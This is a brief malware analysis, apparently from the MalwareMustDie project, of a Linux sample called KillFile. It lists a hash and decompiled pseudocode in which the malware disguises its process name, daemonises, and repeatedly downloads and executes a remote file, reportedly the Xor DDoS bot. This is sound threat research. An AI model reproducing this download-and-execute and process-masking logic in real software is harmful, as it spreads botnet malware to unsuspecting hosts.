Linux/KillFile

1. Linux/KillFile (made in China)
2. It downloaded and execute the Xor DDoS filelessly
3.  
4. hash : 82ba1e7c02b91ee4298717f9a8ba20aae3063107c8d818463ceb5829e5746b48 (uploaded to VT)
5.  
6. Reverse result:
7.  
8. void main(int a1, char arg2)
9. {
10. size_t var_length_procname; from EAX
11.  
12. var_length_procname = strlen(*arg2);
13. memset(*arg2, 0, var_length_procname);
14. memcpy(*arg2, "[bluetooth]", 0xCu);
15. daemon(1, 0);
16. nice(-20);
17. while ( 1 )
18. {
19. if ( kill_time > 4 )
20. {
21. kill_time = 0;
22. killfileandpid();
23. RunFile();
24. }
25. ++kill_time;
26. sleep(1);
27. }
28. }
29.  
30. __pid_t killfileandpid()
31. {
32. __pid_t result; from EAX
33.  
34. result = fork();
35. if ( result >= 0 )
36. {
37. if ( !result )
38. {
39. setsid();
40. umask(0);
41. KillProcess();
42. }
43. result = wait(0);
44. }
45. return result;
46. }
47.  
48. void __noreturn KillProcess()
49. {
50. int v0;
51. char s[10240];
52. int i;
53.  
54. memset(s, 0, 0x2800); // buffer for file
55. memset(&v0, 0, 0x2800); // buffer for mem
56. for ( i = 0; ; ++i )
57. {
58. if ( i > 3 )
59. _exit(0);
60. sprintf(&v0, "%s%s", *(DWORD)&Remote_URL[i], "/txt/kill.txt");
61. if ( http_download(&v0, s, 0) ) // forming HTTP request "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"; save as file s
62. break;
63. }
64. if ( s[strlen(s) - 1] == 10 )
65. s[strlen(s) - 1] = 0;
66. GetProcess(s); // use proc/exec to execute downloaded file and delete the file after exec
67. _exit(0);
68. }
69.  
70. @unixfreaxjp #MalwareMustDie